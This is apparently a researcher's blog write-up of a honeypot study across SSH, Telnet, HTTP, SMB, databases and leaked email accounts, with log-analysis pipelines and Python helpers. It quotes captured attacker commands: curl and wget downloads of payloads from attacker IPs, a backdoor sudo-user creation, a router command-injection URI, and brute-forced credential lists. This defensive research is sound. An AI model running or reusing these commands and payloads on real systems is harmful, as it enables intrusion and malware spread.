Tasting the Honey(pot)
Simple Google dorking reveals tens of thousands of leaked credentials for all kinds of services: machine logins, email addresses, social media accounts, software license keys and pretty much anything else that can grant an identity. Even with Google’s attempts to skip indexing this data and to mask sensitive information, thousands of such pages can be found across paste sites and forums. This number grows significantly when using non-mainstream search engines. A sizable share of social media traffic and a large share of general internet traffic is generated by bots and botnets, which need some sort of identity to operate on these platforms and tend to take over accounts to continue their campaigns. It is therefore crucial to understand how these automated entities propagate themselves across applications and protocols.
This is where the concept of a honeypot comes in. The general idea is to intentionally leak part or all of a credential for some service and observe how and where it is picked up and what is done with it. Beyond credentials, honeypots are also used to understand the tooling that bad actors or automated entities use for scanning, payload generation and payload delivery, and to observe their interaction and behaviour.
Server overview
After initially testing several honeypot packages on my local systems and messing around with port forwarding and containers, I realized that servers in multiple geographies would naturally attract more traffic. I spun up ~12 servers across multiple countries, with specs that varied based on the services they were running. Most of the tools I used are listed in the awesome-honeypots project.
SSH
(remote access)
By far the most commonly probed protocol: TCP/22 was being enumerated within minutes of the server coming up.
Within the first 48 hours alone:
Distribution of IP addresses (top 10):
grep "New connection" *.log | cut -d ' ' -f 5 | cut -d ':' -f 1 | sort | uniq -c | sort -nr
15046 23.153.232.26
30 185.224.128.34
29 157.230.80.76
19 122.171.18.122
17 171.221.205.30
17 122.171.19.21
12 115.241.74.34
7 121.143.130.12
6 59.4.213.254
6 220.82.240.49
... 153 more rows
Count of unique IP addresses:
grep "New connection" *.log | cut -d ' ' -f 5 | cut -d ':' -f 1 | sort | uniq -c | sort -nr | wc -l
showed 162 unique IP addresses.
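The same tally can be done outside the shell. Below is a minimal Python sketch, assuming each connection is logged as a line containing "New connection: <ip>:<port>", which is what the cut fields above imply. The sample lines, the bracketed component names and the documentation-range addresses are made up for illustration and are not taken from my logs.

```python
import re
from collections import Counter

# Assumed line shape: "<timestamp> [<component>] New connection: <ip>:<port> (...)"
NEW_CONNECTION = re.compile(r"New connection: (\d{1,3}(?:\.\d{1,3}){3}):\d+")


def count_source_ips(lines):
    """Return a Counter mapping source IP -> number of new connections."""
    counts = Counter()
    for line in lines:
        match = NEW_CONNECTION.search(line)
        if match:
            counts[match.group(1)] += 1
    return counts


# Hypothetical sample lines; the addresses come from documentation ranges.
sample = [
    "2023-01-01T00:00:01Z [factory] New connection: 192.0.2.10:40112 (10.0.0.5:2222) [session: a1]",
    "2023-01-01T00:00:02Z [factory] New connection: 192.0.2.10:40113 (10.0.0.5:2222) [session: a2]",
    "2023-01-01T00:00:03Z [factory] New connection: 198.51.100.7:51000 (10.0.0.5:2222) [session: a3]",
    "2023-01-01T00:00:04Z [transport] Remote SSH version: SSH-2.0-Go",
]

ip_counts = count_source_ips(sample)
for ip, hits in ip_counts.most_common(10):
    print(f"{hits:7d} {ip}")
print("unique IPs:", len(ip_counts))
```

Matching on the message text rather than on a field position keeps the count stable if the number of space-separated fields before the message ever changes.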
Count of unauthorized login events:
grep "unauthorized login" *.log | wc -l
showed 15643 events.
Distribution of SSH client software:
grep "Remote SSH version" *.log | cut -d ' ' -f 6 | sort | uniq -c | sort -nr
15133 SSH-2.0-Go
93 SSH-2.0-OpenSSH_6.0p1
33 SSH-2.0-ZGrab
30 SSH-2.0-libssh2_1.10.0
27 SSH-2.0-OpenSSH_8.9p1
10 SSH-2.0-OpenSSH_9.0
10 SSH-2.0-OpenSSH_7.9p1
7 SSH-2.0-libssh_0.7.4
6 SSH-2.0-OpenSSH_8.4p1
3 SSH-2.0-makiko
3 SSH-2.0-libssh2_1.9.0
3 SSH-2.0-OpenSSH_7.4
2 SSH-2.0-paramiko_2.11.0
2 GET
1 SSH-2.0-OpenSSH_9.3
1 MGLNDD_3.111.217.202_22
1 MGLNDD_3.111.187.169_22
1 MGLNDD_18.223.119.164_22
1 MGLNDD_13.127.128.240_22
Distribution of usernames attempted:
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 2 | sort | uniq -c | sort -nr
15176 root
211 admin
54 pi
47 ubnt
15 sudev
12 usr
10 super
10 default
9 ubuntu
9 support
9 Admin
8 ftp
7 telnet
6 zyfwp
6 vadmin
6 sFTPUser
6 root1
6 hikvision
6 ec2-user
5 user
5 oracle
4 adtecftp
3 www
3 web
3 posiflex
3 ont
2 vagrant
2 test
2 remotessh
2 postgres
2 os
2 jenkins
2 hello
2 git
2 fliruser
2 esuser
2 es
2 aws
2 ansible
2 adtec
2 1234
1 useradmin
1 john
1 guest
1 fedora
1 devops
1 butter
1 anonymous
1 administrator
1 123456
Count of unique passwords attempted:
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 4 | sort | uniq -c | sort -nr | wc -l
gave 15158 unique passwords.
Distribution of passwords attempted (top 20):
grep "login attempt" *.log | cut -d ' ' -f '5' | cut -d "'" -f 4 | sort | uniq -c | sort -nr | head -n 20
54 123456
38
26 root
24 admin
24 1234
22 password
14 0
13 raspberry
13 12345
12 test123
12 Admin123
12 Admin
11 asdf
11 admin1234
11 123
10 inflection
10 admin123!@#
9 root123
9 admin123456
9 111111
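One caveat with the cut-based pipelines above: splitting on spaces truncates any password that itself contains a space. Below is a minimal Python sketch of the same username/password tally using a regular expression instead. It assumes the log line contains "login attempt [b'<user>'/b'<password>']" followed by "failed" or "succeeded", which is my reading of the fields being cut. The sample lines are hypothetical.

```python
import re
from collections import Counter

# Assumed line shape: "... login attempt [b'<user>'/b'<password>'] failed"
LOGIN_ATTEMPT = re.compile(r"login attempt \[b'(.*?)'/b'(.*)'\] (?:failed|succeeded)")


def tally_logins(lines):
    """Return (usernames, passwords) Counters for all login attempts found."""
    users, passwords = Counter(), Counter()
    for line in lines:
        match = LOGIN_ATTEMPT.search(line)
        if match:
            users[match.group(1)] += 1
            passwords[match.group(2)] += 1
    return users, passwords


# Hypothetical sample lines, including a password with spaces and an empty one.
sample = [
    "2023-01-01T00:00:01Z [transport] login attempt [b'root'/b'123456'] failed",
    "2023-01-01T00:00:02Z [transport] login attempt [b'root'/b'my pass word'] failed",
    "2023-01-01T00:00:03Z [transport] login attempt [b'admin'/b''] failed",
    "2023-01-01T00:00:04Z [transport] login attempt [b'pi'/b'raspberry'] succeeded",
]

users, passwords = tally_logins(sample)
print(users.most_common(5))
print("unique passwords:", len(passwords))
```

This sketch does not handle credentials that the logger renders with double quotes or escape sequences; those would need extra care.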
What happens upon successful login?
A few of the commands that were run:
grep -vi "Connection lost" *.log | grep -v "unauthorized login" | grep -v "Remote SSH version" | grep -v "NEW KEYS" | grep -v "login attempt" | grep -v "trying auth" | grep -v "outgoing" | grep -v "incoming" | grep -v "kex alg" | grep -v "SSH client" | grep -v "New connection" | grep -v "starting service" | grep -v "failed auth" | grep -v "Could not read" | cut -d ']' -f 2 | less
Clearly, someone is trying to run an executable. Very commonly spammed:
CMD: ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
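A plausible reading of the dd part (my assumption, the logs do not state the intent): the first 22 bytes of /proc/self/exe cover the start of the ELF header of the running shell, including the word size, byte order and the e_machine field at offset 18, which is enough to decide which binary to deliver. A minimal Python sketch of decoding such a prefix follows; the machine table is a small subset of the ELF specification's values, and the sample bytes are constructed by hand rather than captured.

```python
import struct

# A small subset of e_machine values from the ELF specification.
MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def describe_elf_prefix(prefix):
    """Summarise the first 20+ bytes of an ELF file, or return None if not ELF."""
    if len(prefix) < 20 or prefix[:4] != b"\x7fELF":
        return None
    word_size = {1: "32-bit", 2: "64-bit"}.get(prefix[4], "unknown")
    little = prefix[5] == 1  # EI_DATA: 1 = little-endian, 2 = big-endian
    endian = "little-endian" if little else "big-endian"
    # e_machine is a 2-byte field at offset 18, stored in the file's byte order.
    (machine,) = struct.unpack("<H" if little else ">H", prefix[18:20])
    return word_size, endian, MACHINES.get(machine, f"e_machine={machine}")


# Hand-built 22-byte prefix of a 64-bit little-endian x86-64 binary (hypothetical).
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HHH", 2, 62, 1)
print(describe_elf_prefix(sample))
```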
In another case, some connections triggered an SFTP write of a malicious/patched sshd executable:
dispatching: INIT requestId=3
dispatching: MKDIR requestId=1
SFTP makeDirectory: b'./.6260608818804882209'
dispatching: OPEN requestId=2
SFTP openFile: b'./.6260608818804882209/sshd'
dispatching: WRITE requestId=3
adding 65708 to 65364 in channel 0
dispatching: WRITE requestId=4
dispatching: WRITE requestId=5
...
dispatching: WRITE requestId=735
...
SFTP Uploaded file "sshd" to ./downloads/c589ea48755c88a02e6b15df979f85006d5572c47888740877630c53779750c6
followed by a logout and login:
avatar root logging out
b'root' authenticated with b'password'
followed by:
CMD: echo 1 && cat /bin/echo
CMD: nohup $SHELL -c "curl http://168.119.173.48:60142/linux -o /tmp/ABO2MG1QGA; if [ ! -f /tmp/ABO2MG1QG
CMD: head -c 2344348 > /tmp/DEsmkDf8HO
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
...
<logout>
In some cases, after the patched sshd executable was written, the following was executed:
chmod +x ./.8278773721751228781/sshd;nohup ./.8278773721751228781/sshd 191.252.204.41 5.42.73.122 162.240.149.176 202.133.88.34 111.74.23.213 112.4.238.226 89.116.73.228 117.250.10.204 122.228.207.106 37.60.225.36 107.172.84.105 60.13.37.55 193.203.161.58 159.203.68.250 117.161.233.102 164.92.166.153 95.164.33.119 116.103.228.45 222.77.96.7 18.139.171.248 143.198.110.204 222.186.3.91 107.174.250.150 61.185.15.118 125.122.27.208 193.169.244.205 77.91.78.243 125.220.195.10 18.61.211.205 202.5.16.82 37.58.18.181 92.246.91.100 62.72.1.151 59.38.100.77 125.124.179.148 37.58.18.246 88.218.249.242 221.181.168.32 222.77.96.50 120.71.183.216 125.124.199.57 143.178.159.78 216.181.107.48 114.236.138.231 158.51.96.38 131.153.225.186 80.151.78.147 51.79.230.233 192.227.148.214 221.229.107.155 61.164.145.11 &
nohup <the list above>
It is interesting that a lot of these agents do not try to take over the account entirely. They opportunistically use the credentials to propagate malware.
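The uploaded sshd sample above was stored under a 64-character hexadecimal name, which has the length of a SHA-256 digest. Assuming the honeypot names captured files by the SHA-256 of their content (an assumption on my part), a captured sample can be checked against its file name before looking the hash up anywhere. A minimal Python sketch, demonstrated on a harmless stand-in file rather than the actual sample:

```python
import hashlib
import os
import tempfile


def sha256_of_file(path, chunk_size=65536):
    """Return the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def name_matches_content(path):
    """True if the file's name equals the SHA-256 hex digest of its content."""
    return os.path.basename(path) == sha256_of_file(path)


# Demo with a stand-in payload stored under its own digest (hypothetical data).
with tempfile.TemporaryDirectory() as workdir:
    payload = b"stand-in for a captured upload"
    expected = hashlib.sha256(payload).hexdigest()
    stored = os.path.join(workdir, expected)
    with open(stored, "wb") as handle:
        handle.write(payload)
    demo_digest = sha256_of_file(stored)
    demo_match = name_matches_content(stored)

print(demo_digest == expected, demo_match)
```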
Some other commands included:
/ip cloud print
ifconfig
uname -a
cat /proc/cpuinfo
ps -ef
ps | grep '[Mm
who
uptime
echo -e "\x6F\x6B"
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
nohup $SHELL -c "curl http://43.132.150.184:60134/linux -o /tmp/AhjLPQOFR9; if [ ! -f /tmp/AhjLPQOFR9'
apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 9rDYBD6Z) system && sudo usermod -aG sudo system
openssl passwd -1 9rDYBD6Z
sudo useradd -m -p system
sudo usermod -aG sudo system
Clearly, there is a large repository of persistence, privilege-escalation and system-recon methods we can learn from here. Just a reminder: the data above is from only the first 48 hours.
FTP
(file server)
Within the first 48 hours alone:
Surprisingly, not a lot of activity here.
Distribution of IP addresses:
cat log*/ftp* | grep "cmd': 'AUTH" | cut -d ':' -f 10 | cut -d ',' -f 1 | sort | uniq -c | sort -nr
4 '64.62.197.105'
4 '205.210.31.194'
4 '198.235.24.16'
4 '198.235.24.143'
4 '198.235.24.142'
4 '192.241.222.77'
4 '107.170.224.58'
2 '87.236.176.185'
2 '87.236.176.181'
2 '205.210.31.149'
2 '198.235.24.248'
2 '104.152.52.129'
Distribution of commands issued:
cat log*/ftp* | grep "cmd" | cut -d ':' -f 8 | sort | uniq -c | sort -nr | cut -d ',' -f 1
38 'AUTH'
14 'USER'
12 'SYST'
12 'PASS'
8 'TYPE'
8 'LIST'
4 'QUIT'
2 '\x03 *%À COOKIE
There were 2 LIST operations performed, both with the argument home/ftp/db.txt.
Telnet
(remote access)
Within the first 24 hours alone:
Distribution of IP addresses (top 10):
cat telnet* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr | head -n 10
339 "117.235.230.152"
61 "85.204.215.57"
10 "36.111.149.84"
6 "123.154.252.138"
2 "222.189.105.241"
1 "95.189.48.180"
1 "92.46.224.46"
1 "92.15.182.194"
1 "91.92.252.209"
1 "89.248.162.159"
Distribution of usernames attempted (top 10):
cat telnet* | sed s/\'/\"/g | jq 'select(.action=="login") | .username' | sort | uniq -c | sort -nr | head -n 10
113 "root"
49 "admin"
7 "guest"
4 "supervisor"
3 "user"
3 "888888"
2 "ubnt"
2 "tech"
2 "support"
2 "service"
Distribution of passwords attempted (top 20):
cat telnet* | sed s/\'/\"/g | jq 'select(.action=="login") | .password' | sort | uniq -c | sort -nr | head -n 20
9 "12345"
8 "password"
8 "admin"
8 "1234"
6 "user"
5 "aquario"
5 "888888"
5 "54321"
5 "1234567890"
5 ""
4 "pass"
4 "Win1doW$"
4 "7ujMko0admin"
4 "666666"
4 "5up"
4 "123456"
3 "zsun1188"
3 "zhongxing"
3 "xmhdipc"
3 "ttnet"
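The sed step in these pipelines turns single-quoted records into JSON by swapping every quote, which breaks as soon as a username or password itself contains a quote character. Below is a minimal Python sketch of an alternative, assuming each log line is a Python-style dictionary literal with the keys used in the jq filters above (action, src_ip, username, password). The sample records are hypothetical.

```python
import ast
from collections import Counter


def parse_records(lines):
    """Yield dicts from lines holding Python-literal dictionaries; skip the rest."""
    for line in lines:
        try:
            record = ast.literal_eval(line.strip())
        except (ValueError, SyntaxError):
            continue  # not a parseable literal, e.g. a banner or partial line
        if isinstance(record, dict):
            yield record


def login_passwords(lines):
    """Count passwords across records whose action is 'login'."""
    return Counter(
        record.get("password")
        for record in parse_records(lines)
        if record.get("action") == "login"
    )


# Hypothetical records; the third password contains a quote character.
sample = [
    "{'action': 'connection', 'src_ip': '192.0.2.10'}",
    "{'action': 'login', 'src_ip': '192.0.2.10', 'username': 'root', 'password': '12345'}",
    "{'action': 'login', 'src_ip': '192.0.2.11', 'username': 'admin', 'password': \"it's\"}",
    "not a record",
]

counts = login_passwords(sample)
print(counts.most_common(20))
```

ast.literal_eval only evaluates literals, so it is a reasonable fit for untrusted log content, though very large or deeply nested lines may still be worth guarding against.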
HTTP and HTTPS
(web server)
Within the first 24 hours alone:
Distribution of request type:
cat http* | sed s/\'/\"/g | jq '.action' | sort | uniq -c | sort -nr
875 "GET"
104 "POST"
42 "HEAD"
Distribution of request URIs:
cat http* | sed s/\'/\"/g | jq '.data.uri' | sort | uniq -c | sort -nr
236 "/"
96 "/.env"
36 "/Core/Skin/Login.aspx"
18 "/favicon.ico"
12 "/test"
10 "/robots.txt"
8 "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
6 "example.com:80"
6 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
6 "/upl.php"
6 "/systembc/password.php"
6 "/sitemap.xml"
6 "/password.php"
6 "/info.php"
6 "/geoip/"
6 "/form.html"
6 "/files/"
6 "/bundle.js"
6 "/1.php"
6 "/.well-known/security.txt"
6 "/.git/config"
6 "/sugar_version.json"
.. and many, many more.
The request to the particularly interesting URI
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)
had the user agent: Root Sl*t (censored).
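Decoding the query string makes the injected command easier to read. A minimal Python sketch using only the standard library; decode_query is a helper name I made up, and the URI is the one from the log above, treated purely as a string.

```python
from urllib.parse import parse_qs


def decode_query(uri):
    """Split a request URI at the first '?' and return its decoded parameters."""
    _, _, query = uri.partition("?")
    return {key: values[0] for key, values in parse_qs(query).items()}


uri = (
    "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+"
    "%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+"
    "shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
)

params = decode_query(uri)
print(params["country"])
```

The decoded country parameter is a shell command substitution: it changes to /tmp, downloads a file named shk, makes it executable, runs it with the argument tplink and then deletes it.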
I looked through a lot of methodology for recon, propagation and persistence and found that, because mainstream providers (e.g. Google) have practices such as mandatory recovery setup and activity notifications, ‘disposable’ and non-mainstream providers are of significant interest to entities looking for email addresses. I created many, many accounts across providers, started to leak them across paste sites, forums and social media, and was surprised at the near-instant attempts at brute-force logins.
After reading multiple reports on malware and humans that try to covertly use leaked credentials, I found that many intend to use the credential for as long as possible without raising any alarms, i.e. they simply start using the account without taking it over (which would naturally force the owner to reset it). A similar pattern can be seen with the SSH honeypot earlier in the article: after login, there is an immediate attempt to install and execute malware rather than to change the key and fully own the user. This opportunistic approach makes sense, since most of these accounts are ‘disposable’ or ‘use-and-abandon’ and are not most people’s go-to choice for a main identity; from a bad actor’s point of view, immediate use is worth more than the risk and effort of a reset. The rate at which users actually check these accounts is quite low, and the rate of abandonment (as long as there is no ‘reset notification’) is quite high. And so, I started leaking the password along with the email address, to see the email equivalent of the SSH ‘commands executed’.
Many accounts were taken over (the password was changed and I lost access). However, for the accounts that were logged into without a password change, a large number of sign-ups to social media, chat sites, pastebins and interaction services occurred. Some accounts started sending out phishing/spam/advertisement email. Some accounts started sending and receiving email addresses, IP addresses and social media handles to/from other email addresses, pastebin links and anonymous note URLs - possibly bots/botmasters or human operators trying to collect and share details to further escalate interaction. I wanted to see what actually happens on those social media accounts, but attempts at logging into them from my device resulted in an account block from the platform, likely due to spam detection (logins from different IPs, scraping, rapid interactions etc.), even across multiple networks (home, proxy, etc.). The timing of the messages was sporadic, and the number of social media handles and email addresses sent per file varied. Some usernames obviously indicated humans and were mostly used for free software trials, website sign-ups and social media applications. However, many usernames seemed to follow a pattern and were likely part of a botnet.
Note: I visited some of the social media profiles that were being collected and transferred and they seemed to belong to real people. Perhaps these handles and email addresses were farmed through an operator/bot interacting with real people and sent to a botmaster or another operator. I will not be posting any of their usernames or email addresses and have deleted/disposed of the accounts.
LDAP
(directory services)
Within the first 48 hours alone:
Distribution of IP addresses (top 10):
cat log*/ldap* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr | head -n 10
20 "71.174.241.122"
6 "117.247.23.204"
4 "8.213.129.112"
2 "45.83.66.216"
2 "45.83.64.112"
2 "45.33.80.243"
2 "205.210.31.6"
2 "205.210.31.48"
2 "205.210.31.3"
2 "205.210.31.177"
2 "205.210.31.16"
I ran a low-interaction solution for LDAP and might explore a more sophisticated solution in the future.
SMB
(network file shares)
Within the first 24 hours alone:
Distribution of IP addresses (top 10):
cat log*/smb* | sed s/\'/\"/g | jq ".src_ip" | sort | uniq -c | sort -nr | head -n 10
336 "213.6.17.78"
178 "59.153.18.93"
156 "182.78.227.58"
94 "182.239.114.72"
14 "95.181.128.134"
6 "191.33.93.162"
6 "171.224.180.227"
6 "125.162.237.19"
6 "103.183.240.2"
5 "123.25.115.28"
Distribution of workgroup names attempted:
cat log*/smb* | sed s/\'/\"/g | jq ".data" | grep -v "Incoming connection" | cut -d ' ' -f 2 | sort | uniq -c | sort -nr
188 (domainname\\administrator,LOCALPCNAME)"
158 (WORKGROUP\\Administrator,WIN-48Q9KQD852D)"
102 (\\for,)"
102 (\\accounts,)"
78 (\\사용자,)"
74 (\\User,)"
58 (\\\\\\,)"
44 (\\,)"
24 \\
18 (\\계정,)"
10 .\\
2 (\\GUEST,)"
2 (WORKGROUP\\,WINDOWS)"
IPP
(printing over the internet)
I ran a low-interaction honeypot for this protocol and received a few scan requests from CensysInspect/1.1 to POST /ipp and a few requests with the following payload:
VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://54.151.110.227:631/ipp|ATTR requested-attributes all
MSSQL and MySQL
(database servers)
Within the first 24 hours alone:
Distribution of IP addresses (top 10):
cat log*/mssql* | sed s/\'/\"/g | jq 'select(.action=="connection") | .src_ip' | sort | uniq -c | sort -nr | head -n 10
455 "58.210.84.206"
275 "223.68.154.158"
171 "128.65.181.53"
44 "36.134.98.177"
8 "121.28.0.62"
2 "60.1.128.255"
2 "45.250.231.106"
2 "45.201.132.128"
2 "41.205.56.191"
2 "23.224.97.225"
I also noticed a lot of password guessing against the username sa, with 468 passwords attempted. Some examples are below:
"P@$$w0rd"
"Heaven"
"Douglas1"
"Dennis"
"Aa12345678"
"Aa123456"
"ALEX"
"ABCabc123"
"A123456"
"88888888"
"62 35 61 38 61 63 36 66 38 30 35 39 36 34 31 31 33 34 32 32 37 3"
"6105"
"5201314"
"4yqbm4,m`~!@~#$%^&*(),.;"
MySQL had similar characteristics, with the addition of a few interesting usernames:
\x17a-ٸe
TL'W{\x12^
)\x08і
.3K
J+,
PJL
(printer and host communication protocol)
This was a low-interaction solution; however, a few interesting commands were submitted:
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO STATUS\n@PJL INFO ID\n"
"GET / HTTP/1.1\r\nHost: 13.233.138.158:9100\r\nAccept: */*\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\nHost: 54.151.110.227:9100\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 13.233.138.158\r\nAccept: */*\r\n\r\n"
"HELPREDIS\r\ninfo\r\n"
"User User\r\n"
Elastic
(document indexing and search engine)
This was a low-interaction solution as well; however, a few interesting requests were seen:
"GET / HTTP/1.0\r\n"
"GET / HTTP/1.1\r\n"
"GET /?CAVIT HTTP/1.1\r\n"
"GET /_search HTTP/1.1\r\n"
"GET /api HTTP/1.0\r\n"
"GET /hazelcast/rest/cluster HTTP/1.0\r\n"
"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n"
"GET /server-info HTTP/1.1\r\n"
"GET /version HTTP/1.1\r\n"
The problem remains
As we can see, the number of bots AND humans attempting to gain an identity or an account is massive. The IPv4 space is continuously being port scanned, and web content is continuously being searched and indexed. Countless forums on the general internet give out thousands of credentials and keys of all types, sometimes free and sometimes paid, and some show up on the first page of Google itself. Once again, the actual number of sites discovered grows significantly with alternative search engines.
I also found multiple open-source, readily available tools that create email addresses in bulk while avoiding abuse detection. Many online forums and open-source tools also offer out-of-the-box solutions that use browser automation to trivially bypass limits on fetching and sending email programmatically, whether via API or through IMAP/SMTP libraries. This implies that bots and human operators can create addresses in bulk with a relatively low barrier to entry.
With the boundaries between bad actors, bots and genuine users getting blurrier by the day, attacks are becoming more sophisticated and covert. Password breach detection solutions such as haveibeenpwned are at the forefront of user notification in the context of organizational breaches. However, we also need systems that scan the IPv4 space and the web, to lower the rate of identity compromise and malicious activity and to minimize the time to notification.
What’s next?
Further analysis of bot/human behaviour in credential search
In the shortest case, an SSH login was picked up within 2 minutes of being posted to a paste site. Scrapers or human operators might choose to try credentials based on the manner of presentation of the information. It would be interesting to see how scrapers/humans behave in combinations of the following variables:
- one-address leaks
- multiple-address leaks
- some credentials working
- all credentials working
- no credentials working
- timer on the content
Research on honeypot detection is becoming popular, and will further lead to smarter honeypots.
Further analysis of account recovery mechanism vs. takeover
Initially, many accounts were logged into and had their password changed, at which point I lost access, since I had not set any recovery mechanism. With a recovery email set, it got better, but it was still frequently unset and I lost access again. However, after setting less common recovery methods such as phrases/key-files, relatively fewer takeovers occurred. Since recovery emails and phone numbers are the most common methods, they are presented front and center and may clearly direct the actions of a bad actor once the account is taken over. For example, a recovery email may be deleted, since the attacker already knows the password and is in the account. Lesser-used mechanisms such as phrases/key-files or device binding, which are presented in different UI sections altogether, seem to do a better job of not being overridden. Users should be made aware of these mechanisms as stronger alternatives.
Can we predict usernames and addresses that bots will use to intercept info or thwart networks?
It would also be of interest to study the pattern of usernames being used and to try to take up the address space or intercept the process. Bot detection on social media sites is a big problem, and pre-emptively creating or blocking predictable usernames, once a bot naming pattern has been established, might help. What’s more interesting: given that a lot of modern malware, botnets and human operators use social media for C&C, would creating accounts based on a username pattern lead us to pings/beacons from the ‘real’ bots or the ‘real’ human operators? There is some academic and hobbyist research in this area, but it seems to be in its early stages. A very interesting rabbit hole to go down.
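As a rough illustration of what "establishing a naming pattern" could mean, here is a minimal Python sketch that collapses each username into a coarse shape (runs of letters become "a", runs of digits become "9") and counts how often each shape occurs. This is only one simple heuristic I am assuming for the example, not a method from any of the research mentioned, and the usernames are invented rather than taken from the accounts I observed.

```python
import re
from collections import Counter


def shape(username):
    """Collapse a username into a coarse shape: letter runs -> 'a', digit runs -> '9'."""
    collapsed = re.sub(r"[A-Za-z]+", "a", username)
    return re.sub(r"[0-9]+", "9", collapsed)


def dominant_shapes(usernames, top=3):
    """Return the most common username shapes with their counts."""
    return Counter(shape(name) for name in usernames).most_common(top)


# Invented usernames for illustration only.
sample = ["mike48213", "anna90011", "lucas7734", "john.smith", "k_turner"]
print(dominant_shapes(sample))
```

A shape that dominates a set of observed usernames could then be used to generate candidate names to register or watch, although real naming schemes are likely to need something richer than this.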
Leak discovery and improved awareness
I have additional research ongoing regarding content discovery and will be writing that up soon. It would be nice to have a service that monitors email leaks and informs users across multiple mediums. Password breach detection services such as haveibeenpwned are quite popular; however, I have not come across any that scrape the general internet or the IPv4 port space looking for leaks. Informing the user can lead to improved awareness and lower the chance of a successful phishing/spam/scam campaign. I also intend to search alternative networks for this, namely IPFS.
Note: all the opinions presented in this article are purely my own and do not represent any other entity. All the tools and techniques I have described here are for research purposes. Do not attempt to scan or log into an account or service that you do not own.